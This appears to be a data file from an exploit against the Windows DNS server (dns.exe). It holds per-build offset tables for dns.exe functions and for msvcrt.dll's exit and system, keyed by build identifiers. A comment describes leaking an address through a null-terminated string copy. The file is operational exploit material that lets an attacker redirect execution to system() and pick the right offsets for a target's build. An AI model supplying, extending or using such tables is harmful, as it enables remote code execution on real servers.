# Per-build offset table for dns.exe.
#
# Key:   (dns!RR_Free, dns!string) -- two 12-bit values. In every entry the
#        first key component equals the low 12 bits of the first value
#        component; the relation of the second component to the values is not
#        visible in this file.
# Value: (dns!RR_Free, dns!NsecDnsRecordConvert, dns!_imp_exit), labelled as in
#        the original author's header comment.
#
# Value shape is NOT uniform: when several builds share one key the value is a
# list of candidate 3-tuples, otherwise it is a single bare 3-tuple. Any
# consumer has to handle both shapes.
#
# Trailing comments hold one or more 33-hex-digit identifiers per row.
# NOTE(review): these look like PDB signature+age strings naming the builds a
# row was derived from -- confirm. If so, they can also be used to check whether
# a deployed dns.exe is one of the builds this table covers.
dnsoffsets = {
    (0x5C0, 0xF88): [
        (0x745C0, 0x170910, 0x18EBF8),  # 011302BE2F23F9F73D2988992DD1E0BB1
        (0x745C0, 0x1708E0, 0x18EBF8),  # 87978EA1EDCA23F37E95D2493B7C5D951
    ],
    (0xE20, 0xDD8): (0x72E20, 0x16D150, 0x18BB18),  # 151173287575479C0F95BBA89A77FD211
    (0xB30, 0xAF8): (0x6DB30, 0x161A10, 0x17FB48),  # 121B09047E4ACAE11D392CD54B858BEC1
    (0x0E0, 0xB78): (0x730E0, 0x16D0A0, 0x18BB10),  # 26F4F38E8B084F1C9BCB1800DF1BAB511
    (0xA30, 0xFA8): (0x74A30, 0x170E30, 0x18FBF8),  # 2A0D9CCEE7FE2FCC0E589B850D682BE11
    (0x100, 0xCE8): [
        (0x71100, 0x168300, 0x185B40),  # 2C12CA6B7E5351E91C8CD14F391CCA781
        (0x71100, 0x1682F0, 0x185B40),  # DD2CBF9B66507D5A001066A8FE393D981
    ],
    (0x250, 0xD48): (0x72250, 0x169540, 0x187B48),  # 30795D39DB1D1B784571D7E15DDBE0A61
    (0x680, 0xB38): (0x72680, 0x16C280, 0x18AB10),  # 384AC9D18DA74834AFCBE4D0D404EEC01
    (0x630, 0xB38): [
        (0x72630, 0x16C120, 0x18AB10),  # 3A0916A513EF4F0487CCA386725383781
        (0x72630, 0x16C1F0, 0x18AB10),  # 98EAF13B1C7546049C2B7613404F92BB1
        (0x72630, 0x16C1E0, 0x18AB10),  # C8797339F2CB4E34AE92E08DE31531DD1
    ],
    (0x168, 0xA28): (0x74168, 0x12B7AC, 0x182640),  # 3C175EE92CE9411196911477C241DCA51
    (0x750, 0x568): (0x6D750, 0x1663C0, 0x16EE80),  # 46CB75D83C814E689BE8367938E9A8AE1
    (0xE90, 0xE08): (0x72E90, 0x16D1C0, 0x18BB18),  # 512B4E7C391E56392C02A3208F33EC671, 6872C747AA55A5056E97FB67B510A37B1
    (0x680, 0xB68): [
        (0x72680, 0x16C280, 0x18AB10),  # 57EF7C49756A48379AD6DD03EA2CC1F91, 862B29C6A6A845EC9FC6953480795C601
        (0x72680, 0x16C300, 0x18AB10),  # 657A79890FC549AC972E2D3484BA16E61
    ],
    (0xCB0, 0x988): [
        (0x6ECB0, 0x1663D0, 0x184B18),  # 58434840C8D5492DB39839C6653A19291, 5D740018863347A99C1B6837E362888B1
        (0x6ECB0, 0x166420, 0x184B18),  # BE42CEE2F847489AA8F4EEBCA9508AAA1, CCCE6B4727D04E45A4B84E9598B20A281
    ],
    (0xE90, 0xDD8): (0x72E90, 0x16D1C0, 0x18BB18),  # 5B2FE25AB741C36ABDE937A1538758851
    (0x080, 0xE08): [
        (0x73080, 0x16D450, 0x18BB18),  # 5B618CB33807399ECCE94BF53B5315311
        (0x73080, 0x16D420, 0x18BB18),  # 5E1835E78D7B96684E6D768BCBC4DA671
        (0x73080, 0x16D3B0, 0x18BB18),  # D0B1179759CE98E5904423ABAB7886AC1
    ],
    (0x120, 0xB78): (0x73120, 0x16D150, 0x18BB10),  # 6D2B4D6B8ED94CD8AD7256BE45BE3A7D1
    (0xAB0, 0xFB8): (0x74AB0, 0x1717A0, 0x18FBF8),  # 80442E584F9BFFB3D39CA65D3E15052E1
    (0xB30, 0xAD8): (0x6DB30, 0x161720, 0x17FAF8),  # 89F06DEA8817361E8A80A4B1D2309EA31
    (0x730, 0xB68): (0x72730, 0x16C500, 0x18AB10),  # 91A76A8D7FEF46368B3CADA7CA0B85321
    (0x630, 0xF88): (0x74630, 0x170940, 0x18EBF8),  # 9D7E11D9822326ACD3DC906A76CC9CE81
    (0x270, 0xB88): (0x73270, 0x16D340, 0x18BB10),  # A2958B61A2FB4DF3A509954427462D121
    (0x50C, 0xFF8): (0x7950C, 0x13C570, 0x18EE28),  # A3A3EE855EE840F7AF44C1114A7568841
    (0xA10, 0x898): (0x6AA10, 0x157260, 0x15FF28),  # B0FF48A3AAB24EEA9ABC6819F00D16E01
    (0x9E0, 0xFA8): (0x749E0, 0x170DE0, 0x18FBF8),  # B94B9B668BC0A17C42EC9B62CFA27C9D1
    (0x380, 0xCE8): [
        (0x71380, 0x168570, 0x186B40),  # CBE3C9FF59D24A56C677A1360A0488801
        (0x71380, 0x1685F0, 0x186B40),  # E0D72EDD8F6CD476D7D16D50BEA1840B1
    ],
    (0xB90, 0xAD8): (0x6DB90, 0x161790, 0x17FAF8),  # D79B656A0E410B499495ACA68FE82B1C1, EAE1AF9FAB0BD6A67718282AE36129051
    (0xE70, 0xAF8): (0x6DE70, 0x161EB0, 0x17FB48),  # E3820363DC6A7C0663241EF2907D46AF1
    (0xAE0, 0xAE8): (0x6DAE0, 0x161910, 0x17FB38),  # E98B788CA7E1BF518D31EFF7CE12E8681
    (0x220, 0xB88): (0x73220, 0x16D2F0, 0x18BB10),  # F273AF47E4A94A6CABCE7F5AB69404051
    (0xB80, 0xAF8): (0x6DB80, 0x161A60, 0x17FB48),  # FCACA0C020F355530E053DE1AE347BFD1
}
# If the offset ends in a null byte, pick a different msvcrt.dll address for dns!_imp.
# This address is leaked from a null terminated string copy.
# Per-build offset table for msvcrt.dll.
#
# Key:   a 12-bit integer; in every entry it equals the low 12 bits of the
#        first value component.
# Value: (msvcrt!exit, msvcrt!system), labelled as in the original author's
#        header comment.
#
# Trailing comments hold one or more 33-hex-digit identifiers per row.
# NOTE(review): these look like PDB signature+age strings for the matching
# msvcrt.dll builds -- confirm against the project's documentation.
vcrtoffsets = {
    0x8C0: (0x3A8C0, 0x17EC0),  # 1FEA8DB6B57F5FBFA935E090243420D01
    0x15C: (0x0615C, 0x565B0),  # 31BECC4756744732A05F68E6F39589562
    0x8F0: (0x3A8F0, 0x17F10),  # 32501CCF4A34462A8A9A6F1AD7494E7E1, 3AEEACDC9BF0459494C96F68D96236B21
    0xB20: (0x3AB20, 0x18110),  # 4A088EC06E01435FA64A606EA9CD624B1
    0x7D0: (0x3A7D0, 0x17E50),  # 8B174CB6831C3F221C14DB6F010A3BA71
    0x190: (0x3A190, 0x17A40),  # 92D35601E6183C93F1EB3A15BE720BBC1
    0x930: (0x3A930, 0x17EB0),  # 97E165A3E28A5645BB9A295D9DBFBE901
    0x05C: (0x0905C, 0x1F45C),  # A11C26B8EDDC4E2D8D039DB941D1B4DA2
    0x960: (0x3A960, 0x17EB0),  # B40D63CF4E05FF62BDDF63550F5FBEF51
    0xB30: (0x3AB30, 0x18120),  # BAFC8C0A0A7648E0A6C2FC97B72A04B11
    0x350: (0x3A350, 0x17A80),  # D6265247309A824B989B0487E235D7431
    0x6B0: (0x3A6B0, 0x17B40),  # D8A568AED31660BB014D4F525B4E87E91
}